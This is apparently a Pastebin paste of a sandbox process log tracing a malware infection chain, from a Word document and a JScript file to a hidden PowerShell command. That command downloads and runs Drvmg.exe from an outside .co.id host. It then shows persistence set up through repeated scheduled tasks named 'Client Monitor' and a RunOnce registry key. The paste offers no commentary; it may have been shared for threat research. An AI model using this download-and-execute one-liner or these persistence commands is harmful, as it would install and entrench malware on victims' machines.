Advertisement
opexxx

Drvmg.exe

Mar 8th, 2017
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.10 KB | None | 0 0
  1. PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe')
  2.  
  3.  
  4. WINWORD.EXE /n "C:\Specifications.doc" (PID: 3404)
  5. wscript.exe "C:\file.js" (PID: 2028)
  6. cmd.exe /c PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe') & %TEMP%\\anyFileName.exe (PID: 3676)
  7. powershell.exe PoWERSHeLL.EXE -w HIDDEN -nop -Ep bYpaSs (New-OBJect SYsTeM.NEt.WeBCLienT).DOWNlOAdFILe('HtTP://gALErifhaFASHoP.Co.Id/load/Drvmg.exe','%TEMP%\\anyFileName.exe') (PID: 848)
  8. anyFileName.exe %TEMP%\\anyFileName.exe (PID: 2612)
  9. anyFileName.exe (PID: 2664)
  10. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2388)
  11. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2288)
  12. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3320)
  13. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3016)
  14. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3424)
  15. reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Client Monitor" /d "cmd /c """start """Client Monitor""" """%PROGRAMFILES%\Client\client.exe"""" /f" (PID: 2712)
  16. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3528)
  17. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3536)
  18. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3460)
  19. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2652)
  20. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 1308)
  21. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3268)
  22. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3620)
  23. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 1712)
  24. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 172)
  25. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 4092)
  26. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 3760)
  27. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2052)
  28. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2120)
  29. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 284)
  30. schtasks.exe schtasks /create /tn "Client Monitor" /tr "'%PROGRAMFILES%\Client\client.exe' /startup" /sc MINUTE /f /rl highest (PID: 2392)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement